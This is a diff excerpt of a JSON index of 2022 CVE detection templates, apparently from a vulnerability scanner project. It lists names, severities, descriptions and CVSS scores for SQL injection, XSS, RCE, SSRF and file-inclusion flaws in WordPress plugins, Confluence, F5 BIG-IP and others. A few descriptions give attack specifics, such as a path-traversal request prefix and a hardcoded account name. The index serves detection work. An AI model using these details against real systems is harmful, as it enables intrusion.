{"ID":"CVE-2022-0824","Info":{"Name":"Webmin prior to 1.990 - Improper Access Control to Remote Code Execution","Severity":"high","Description":"Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0824.yaml"}
{"ID":"CVE-2022-0826","Info":{"Name":"WP Video Gallery \u003c= 1.7.1 - Unauthenticated SQLi","Severity":"critical","Description":"The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0826.yaml"}
{"ID":"CVE-2022-0826","Info":{"Name":"WordPress WP Video Gallery \u003c=1.7.1 - SQL Injection","Severity":"critical","Description":"WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0826.yaml"}
{"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0867.yaml"}
{"ID":"CVE-2022-0870","Info":{"Name":"Gogs - SSRF","Severity":"medium","Description":"Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-0870.yaml"}
{"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c= 1.0.9 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0885.yaml"}
{"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0928.yaml"}
{"ID":"CVE-2022-0948","Info":{"Name":"Order Listener for WooCommerce \u003c 3.2.2 - Unauthenticated SQLi","Severity":"critical","Description":"The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0948.yaml"}
{"ID":"CVE-2022-0948","Info":{"Name":"WordPress Order Listener for WooCommerce \u003c3.2.2 - SQL Injection","Severity":"critical","Description":"WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0948.yaml"}
{"ID":"CVE-2022-0952","Info":{"Name":"Sitemap by click5 \u003c 1.0.36 - Unauthenticated Arbitrary Options Update","Severity":"high","Description":"The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0952.yaml"}
{"ID":"CVE-2022-0954","Info":{"Name":"Microweber \u003c1.2.11 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0954.yaml"}
{"ID":"CVE-2022-0963","Info":{"Name":"Microweber \u003c1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0963.yaml"}
@ -1333,6 +1343,7 @@
{"ID":"CVE-2022-1057","Info":{"Name":"WordPress Pricing Deals for WooCommerce \u003c=2.0.2.02 - SQL Injection","Severity":"critical","Description":"WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1057.yaml"}
{"ID":"CVE-2022-1119","Info":{"Name":"WordPress Simple File List \u003c3.2.8 - Local File Inclusion","Severity":"high","Description":"WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1119.yaml"}
{"ID":"CVE-2022-1162","Info":{"Name":"GitLab CE/EE - Hardcoded password","Severity":"critical","Description":"A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1162.yaml"}
{"ID":"CVE-2022-1168","Info":{"Name":"JobSearch \u003c 1.5.1 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1168.yaml"}
{"ID":"CVE-2022-1221","Info":{"Name":"WordPress Gwyn's Imagemap Selector \u003c=0.3.3 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1221.yaml"}
{"ID":"CVE-2022-1386","Info":{"Name":"WordPress Fusion Builder \u003c 3.6.2 - Unauthenticated SSRF","Severity":"critical","Description":"The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1386.yaml"}
{"ID":"CVE-2022-1388","Info":{"Name":"F5 BIG-IP iControl - REST Auth Bypass RCE","Severity":"critical","Description":"F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1388.yaml"}
@ -1342,7 +1353,7 @@
{"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1439.yaml"}
{"ID":"CVE-2022-1442","Info":{"Name":"WordPress Plugin Metform \u003c= 2.1.3 - Unauthenticated Sensitive Information Disclosure","Severity":"high","Description":"The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1442.yaml"}
{"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1574.yaml"}
{"ID":"CVE-2022-1595","Info":{"Name":"HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure","Severity":"medium","Description":"The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1595.yaml"}
{"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1595.yaml"}
{"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1597.yaml"}
{"ID":"CVE-2022-1598","Info":{"Name":"WordPress Plugin WPQA \u003c 5.5 - Unauthenticated Private Message Disclosure","Severity":"medium","Description":"The plugin which is a companion to the Discy and Himer themes, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1598.yaml"}
{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10.0"}},"file_path":"cves/2022/CVE-2022-1609.yaml"}
@ -1362,6 +1373,7 @@
{"ID":"CVE-2022-2034","Info":{"Name":"Sensei LMS \u003c 4.5.0 - Unauthenticated Private Messages Disclosure","Severity":"medium","Description":"The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-2034.yaml"}
{"ID":"CVE-2022-21371","Info":{"Name":"Oracle WebLogic Server Local File Inclusion","Severity":"high","Description":"An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-21371.yaml"}
{"ID":"CVE-2022-21500","Info":{"Name":"Oracle E-Business Suite \u003c=12.2 - Authentication Bypass","Severity":"high","Description":"Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-21500.yaml"}
{"ID":"CVE-2022-21587","Info":{"Name":"Oracle EBS Unauthenticated - Remote Code Execution","Severity":"critical","Description":"Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-21587.yaml"}
{"ID":"CVE-2022-21705","Info":{"Name":"October CMS - Remote Code Execution","Severity":"high","Description":"October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-21705.yaml"}
{"ID":"CVE-2022-2185","Info":{"Name":"GitLab CE/EE - Import RCE","Severity":"high","Description":"A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-2185.yaml"}
{"ID":"CVE-2022-2187","Info":{"Name":"WordPress Contact Form 7 Captcha \u003c0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-2187.yaml"}
@ -1385,7 +1397,7 @@
{"ID":"CVE-2022-2379","Info":{"Name":"Easy Student Results \u003c= 2.2.8 - Information Disclosure","Severity":"high","Description":"The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-2379.yaml"}
{"ID":"CVE-2022-23808","Info":{"Name":"phpMyAdmin \u003c 5.1.2 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-23808.yaml"}
{"ID":"CVE-2022-2383","Info":{"Name":"WordPress Feed Them Social \u003c3.0.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-2383.yaml"}
{"ID":"CVE-2022-23854","Info":{"Name":"AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal","Severity":"high","Description":"AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-23854.yaml"}
{"ID":"CVE-2022-23854","Info":{"Name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","Severity":"high","Description":"AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-23854.yaml"}
{"ID":"CVE-2022-23881","Info":{"Name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","Severity":"critical","Description":"ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-23881.yaml"}
{"ID":"CVE-2022-23944","Info":{"Name":"Apache ShenYu Admin Unauth Access","Severity":"critical","Description":"Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-23944.yaml"}
{"ID":"CVE-2022-24112","Info":{"Name":"Apache APISIX - Remote Code Execution","Severity":"critical","Description":"A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-24112.yaml"}
@ -1414,7 +1426,7 @@
{"ID":"CVE-2022-25481","Info":{"Name":"ThinkPHP 5.0.24 - Information Disclosure","Severity":"high","Description":"ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-25481.yaml"}
{"ID":"CVE-2022-2551","Info":{"Name":"Duplicator \u003c 1.4.7 - Unauthenticated Backup Download","Severity":"high","Description":"The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-2551.yaml"}
{"ID":"CVE-2022-26134","Info":{"Name":"Confluence - Remote Code Execution","Severity":"critical","Description":"Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26134.yaml"}
{"ID":"CVE-2022-26138","Info":{"Name":"Questions For Confluence - Hardcoded Credentials","Severity":"critical","Description":"A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26138.yaml"}
{"ID":"CVE-2022-26138","Info":{"Name":"Atlassian Questions For Confluence - Hardcoded Credentials","Severity":"critical","Description":"Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26138.yaml"}
{"ID":"CVE-2022-26148","Info":{"Name":"Grafana \u0026 Zabbix Integration - Credentials Disclosure","Severity":"critical","Description":"Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26148.yaml"}
{"ID":"CVE-2022-26159","Info":{"Name":"Ametys CMS Information Disclosure","Severity":"medium","Description":"Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-26159.yaml"}
{"ID":"CVE-2022-26233","Info":{"Name":"Barco Control Room Management Suite \u003c=2.9 Build 0275 - Local File Inclusion","Severity":"high","Description":"Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-26233.yaml"}
@ -1423,16 +1435,17 @@
{"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26352.yaml"}
{"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-26564.yaml"}
{"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-26960.yaml"}
{"ID":"CVE-2022-27593","Info":{"Name":"QNAP QTS Photo Station External Reference","Severity":"critical","Description":"An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-27593.yaml"}
{"ID":"CVE-2022-27593","Info":{"Name":"QNAP QTS Photo Station External Reference - Local File Inclusion","Severity":"critical","Description":"QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-27593.yaml"}
{"ID":"CVE-2022-27849","Info":{"Name":"WordPress Simple Ajax Chat \u003c20220116 - Sensitive Information Disclosure vulnerability","Severity":"high","Description":"WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-27849.yaml"}
{"ID":"CVE-2022-27927","Info":{"Name":"Microfinance Management System 1.0 - SQL Injection","Severity":"critical","Description":"Microfinance Management System 1.0 is susceptible to SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-27927.yaml"}
{"ID":"CVE-2022-28079","Info":{"Name":"College Management System 1.0 - SQL Injection","Severity":"high","Description":"College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-28079.yaml"}
{"ID":"CVE-2022-28080","Info":{"Name":"Royal Event - SQL Injection","Severity":"high","Description":"Royal Event is vulnerable to a SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-28080.yaml"}
{"ID":"CVE-2022-28117","Info":{"Name":"Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF)","Severity":"medium","Description":"A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"cves/2022/CVE-2022-28117.yaml"}
{"ID":"CVE-2022-28219","Info":{"Name":"Zoho ManageEngine ADAudit Plus \u003c7600 - XML Entity Injection/Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an\nunauthenticated XML entity injection attack that can lead to remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-28219.yaml"}
{"ID":"CVE-2022-28290","Info":{"Name":"WordPress Country Selector \u003c1.6.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-28290.yaml"}
{"ID":"CVE-2022-28363","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-28363.yaml"}
{"ID":"CVE-2022-28365","Info":{"Name":"Reprise License Manager 14.2 - Information Disclosure","Severity":"medium","Description":"Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-28365.yaml"}
{"ID":"CVE-2022-2863","Info":{"Name":"WordPress WPvivid Backup \u003c 0.9.76 - Local File Inclusion","Severity":"medium","Description":"The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack.","Classification":{"CVSSScore":"4.9"}},"file_path":"cves/2022/CVE-2022-2863.yaml"}
{"ID":"CVE-2022-2863","Info":{"Name":"WordPress WPvivid Backup \u003c0.9.76 - Local File Inclusion","Severity":"medium","Description":"WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.","Classification":{"CVSSScore":"4.9"}},"file_path":"cves/2022/CVE-2022-2863.yaml"}
{"ID":"CVE-2022-28955","Info":{"Name":"D-Link DIR816L - Access Control","Severity":"high","Description":"An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-28955.yaml"}
{"ID":"CVE-2022-29004","Info":{"Name":"Diary Management System 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29004.yaml"}
{"ID":"CVE-2022-29005","Info":{"Name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","Severity":"medium","Description":"Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29005.yaml"}
@ -1441,6 +1454,7 @@
{"ID":"CVE-2022-29009","Info":{"Name":"Cyber Cafe Management System 1.0 - SQL Injection","Severity":"critical","Description":"Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29009.yaml"}
{"ID":"CVE-2022-29014","Info":{"Name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","Severity":"high","Description":"Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-29014.yaml"}
{"ID":"CVE-2022-29078","Info":{"Name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","Severity":"critical","Description":"Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29078.yaml"}
{"ID":"CVE-2022-29153","Info":{"Name":"HashiCorp Consul/Enterprise - Server Side Request Forgery","Severity":"high","Description":"HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11.4 may allow server side request forgery when the Consul client agent follows redirects returned by HTTP health check endpoints. Consul follows HTTP redirects by default. HTTP + Interval health check configuration now provides a disable_redirects option to prohibit this behavior.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-29153.yaml"}
